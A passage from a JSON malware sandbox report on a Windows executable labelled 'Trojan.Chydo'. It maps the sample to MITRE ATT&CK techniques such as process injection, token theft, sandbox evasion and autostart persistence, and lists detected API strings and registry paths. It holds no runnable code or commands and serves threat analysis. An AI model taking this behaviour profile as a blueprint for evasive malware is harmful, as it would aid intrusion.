"total_file_compositions_imports": 68}, "processes": [{"uid": "00000000-00005872", "name": "c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe", "normalized_path": "C:\\c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe", "sha256": "c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110", "av_label": "Trojan.Chydo", "av_matched": 19, "av_total": 22}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 2, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 13}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-315", "type": 2, "relevance": 1, "name": "Contains ability to create/open files (API string)", "description": "Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"CreateFileMappingW\" (Indicator: \"CreateFile\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"CreateFileW\" (Indicator: \"CreateFile\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"CreateFileW\" (Indicator: \"CreateFile\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"CreateFileMappingW\" (Indicator: \"CreateFile\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; Source: \"00000000-00005872.00000001.68165.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-423", "type": 2, "relevance": 1, "name": "Contains ability to create directories (API string)", "description": "Found reference to API \"CreateDirectoryA\" (Indicator: \"CreateDirectory\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"CreateDirectoryA\" (Indicator: \"CreateDirectory\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API \"307662654270,5880,3140,,CreateProcessW,kernel32.dll,\"252:04:50.700\",RX=0,PX=0\" (Indicator: \"CreateProcess\"; Source: \"00000000-00005872.00000003.75601.00260000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-345", "type": 2, "relevance": 1, "name": "Contains ability to disable/close registry key (API string)", "description": "Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11CF-8B85-00AA005B4383}\" in Source: 00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\n \"m3d_svga3_msisettings_hklm\\system\\currentcontrolset\\enum\\<deviceinstance>\" in Source: 00000000-00003284.00000001.74331.00150000.00000004.mdmp\n \"m3d_softwaredevicesettings_common_hklm\\system\\currentcontrolset\\control\\class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\<driverinstance>\" in Source: 00000000-00003284.00000001.74331.00150000.00000004.mdmp\n \"Software\\Skype\\Phone\" in Source: 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\" in Source: 00000000-00005872.00000003.75601.00260000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetLastError\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"HeapFree\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetStdHandle\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"LCMapStringW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetHandleCount\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetSystemInfo\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"lstrcpynA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"VirtualProtect\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"FreeLibrary\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"LCMapStringA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"HeapDestroy\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"ExitProcess\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetEnvironmentStringsW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetVersionExA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"RtlUnwind\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"LoadLibraryA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"Process32Next\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"HeapAlloc\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetEnvironmentStrings\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetLocaleInfoA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"Process32First\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetCurrentDirectoryA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetErrorMode\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"HeapSize\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetCommandLineA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"OpenMutexA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CreateMutexA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"lstrlenA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetTempPathA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetCPInfo\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetStringTypeA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"lstrcatA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"InterlockedExchange\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"WriteFile\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CloseHandle\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetSystemTimeAsFileTime\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetComputerNameA\"; File: 